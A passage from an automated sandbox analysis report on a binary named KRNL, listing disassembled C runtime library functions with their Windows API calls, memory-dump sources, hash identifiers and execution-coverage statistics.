                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00f9750563f2fe673a8d33c5edbd75144119448b6ac6ad0782044d2ef46c86c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40219D71604219EFDB20AFA5C88187BB7E9FF003657908619FD19D7591E739EC008BA0
                                                                                                                                                                                                                                                          Function 006F2BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9086f7d967999b9e273ad7d7f9a20c88b12d3eb268eac38136c598d2c6869b74
                                                                                                                                                                                                                                                          • Instruction ID: 743c1983a16e57fbd28b97eda628ff8145e1233a7b2fd939840e73b99f349af9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9086f7d967999b9e273ad7d7f9a20c88b12d3eb268eac38136c598d2c6869b74
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021C27120420FAF8B60AF698CE19BA776BFF403647118518FB59D7250EB31EC41CBA4
                                                                                                                                                                                                                                                          Function 007031BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 007031C6
                                                                                                                                                                                                                                                            • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007031FE
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0070321E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                                          • Opcode ID: 991185f91c5ee31166b569b684eb36de0b794b37d1f18b7581a5b5c4e6ed1083
                                                                                                                                                                                                                                                          • Instruction ID: a9086f0b60c8ade8bd266190ba8c979d4e71fcc7c679fa586c044d0fce26910a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 991185f91c5ee31166b569b684eb36de0b794b37d1f18b7581a5b5c4e6ed1083
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E11D6B1501119FEE7112BB5AC8ACFF6A9DEEC97947104219FA01D1181FF78EF0141B5
                                                                                                                                                                                                                                                          Function 006EE892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 006EE899
                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006EE8A3
                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 006EE8BA
                                                                                                                                                                                                                                                            • Part of subcall function 006EC1E5: std::_Lockit::_Lockit.LIBCPMT ref: 006EC1F6
                                                                                                                                                                                                                                                            • Part of subcall function 006EC1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 006EC210
                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006EE914
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1383202999-0
                                                                                                                                                                                                                                                          • Opcode ID: 7ac5ea129ff14389ee37ed9e4ed59ef047d07906554cd1d984d78d00750049b0
                                                                                                                                                                                                                                                          • Instruction ID: 46f2b251a2012147f147dc9994ce2ea67eddd5552831ab63fe3d3d4622eec8b7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ac5ea129ff14389ee37ed9e4ed59ef047d07906554cd1d984d78d00750049b0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C01102358023959BCB01EBAAC9056BE77A3AF80320F25411DE4016B2C2CF34AE01CB89
                                                                                                                                                                                                                                                          Function 0070ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000), ref: 0070ADB7
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?,?,?,00703CD6,00000000), ref: 0070ADC3
                                                                                                                                                                                                                                                            • Part of subcall function 0070AE20: CloseHandle.KERNEL32(FFFFFFFE,0070ADD3,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?,?), ref: 0070AE30
                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 0070ADD3
                                                                                                                                                                                                                                                            • Part of subcall function 0070ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0070AD91,0070A2DC,?,?,00704390,?,00000000,00000000,?), ref: 0070AE08
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?), ref: 0070ADE8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                          • Opcode ID: bf7924cf076a20245278e2d3a7418fe119e6b7ec593cca223ee7bda0efa26c35
                                                                                                                                                                                                                                                          • Instruction ID: 54fb4119b60394895a47349dd540aa8b5fabbcf1881a54a8a71d65eaf9f8c03a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf7924cf076a20245278e2d3a7418fe119e6b7ec593cca223ee7bda0efa26c35
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADF01236600229FBCF221FD9EC089DA3F66FF047A1F00C111FE08851A4D73AC8609B95
                                                                                                                                                                                                                                                          Function 006F04F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 006F0507
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006F0516
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 006F051F
                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 006F052C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                          • Opcode ID: aae8c9efb57ef37206f0982b3e69251400d5376f8765ff8d906e2a822d65b356
                                                                                                                                                                                                                                                          • Instruction ID: 624c8c8d1f7abbc2243d2be23e1d6b62d8ad55043a06f7365ffe7eb9ae28115f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aae8c9efb57ef37206f0982b3e69251400d5376f8765ff8d906e2a822d65b356
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F05F74D1120DEBCB00DFB8DA499DEBBF4FF1C200B918995A452E6150EA34AB44DB54
                                                                                                                                                                                                                                                          Function 006FB992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006FB893,?,?,00000000,00000000,00000000,?), ref: 006FB9B7
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                          • Opcode ID: f5a3b55e5c72e0b2502ddb70ff912645718bdc90155dd271cfbeda2eb29666be
                                                                                                                                                                                                                                                          • Instruction ID: 8b49dbc0d829e7cd1ab3b9344a7dec2ba2566e6f805eba058c645a48167d4bfa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5a3b55e5c72e0b2502ddb70ff912645718bdc90155dd271cfbeda2eb29666be
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4241347290020DAFCF15DF98CC81AEEBBB6FF48300F189199FA14A7222D3759950DB91
                                                                                                                                                                                                                                                          Function 006FB1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 006FB475
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                                          • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                          • Opcode ID: bd59a1eb5dda5866b79bd2c7b59a12665f0afe7042a8db01c5d4b2234511d839
                                                                                                                                                                                                                                                          • Instruction ID: 6e1dd83ed214097eb2670d2ff6bff18461d0fc674b79f14ba522985c299029a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd59a1eb5dda5866b79bd2c7b59a12665f0afe7042a8db01c5d4b2234511d839
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B431D57250021DEBCF269F90CD448FE7B67FF09315B18965AFA544A222C33ADD61DB81
                                                                                                                                                                                                                                                          Function 006EB831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006EB8B9
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?), ref: 006EB8DE
                                                                                                                                                                                                                                                            • Part of subcall function 006F060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,006EF354,02924DA0,?,?,?,006EF354,006E3D4A,0071759C,006E3D4A), ref: 006F066D
                                                                                                                                                                                                                                                            • Part of subcall function 006F8353: IsProcessorFeaturePresent.KERNEL32(00000017,006FC224), ref: 006F836F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                          • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                          • Opcode ID: 9ca096931ade157abe73758a3670340521f7aa8b33080543203f7b3cf4cd8428
                                                                                                                                                                                                                                                          • Instruction ID: c3957d0d1d5e4f673619f74532783bb5e4c57914bfb5cba4ce5e8a39211888e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ca096931ade157abe73758a3670340521f7aa8b33080543203f7b3cf4cd8428
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD215531E02358EBCF249F9AD945AEFB7BAAF54710F14540AE405AB350CB70AD458B81
                                                                                                                                                                                                                                                          Function 006EB46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 006E2673
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                          • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                          • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                                          • Opcode ID: d2b0de6f9a33efe203d3a6bca6d609cf212f142b6367e3e1300e0f03bef70bee
                                                                                                                                                                                                                                                          • Instruction ID: a495ef1df2cbff79822e63290eb82af11f077fea2c9069ed9ed00fe9c6958118
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2b0de6f9a33efe203d3a6bca6d609cf212f142b6367e3e1300e0f03bef70bee
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F01DFF1609305EBDB14DF28D856A6B7BE9AF08318F11892CF45D8B381D379E848CB85
                                                                                                                                                                                                                                                          Function 006E2610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006F060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,006EF354,02924DA0,?,?,?,006EF354,006E3D4A,0071759C,006E3D4A), ref: 006F066D
                                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 006E2673
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                          • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                          • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                                          • Opcode ID: 8db41a135dd94c215ddfb7e1d4397b9eaa452265a8cee651155429ce22747484
                                                                                                                                                                                                                                                          • Instruction ID: 604c0ce2b604bc0234580df0db794dc208271eba5c89ba3b93fdbdc1fe117293
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db41a135dd94c215ddfb7e1d4397b9eaa452265a8cee651155429ce22747484
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F8F1614300EBE710AF58D846757BBE8EB58718F11892CF5989B381D3B9D894CB92

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:5.4%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:6.2%
                                                                                                                                                                                                                                                          Signature Coverage:52.9%
                                                                                                                                                                                                                                                          Total number of Nodes:257
                                                                                                                                                                                                                                                          Total number of Limit Nodes:19
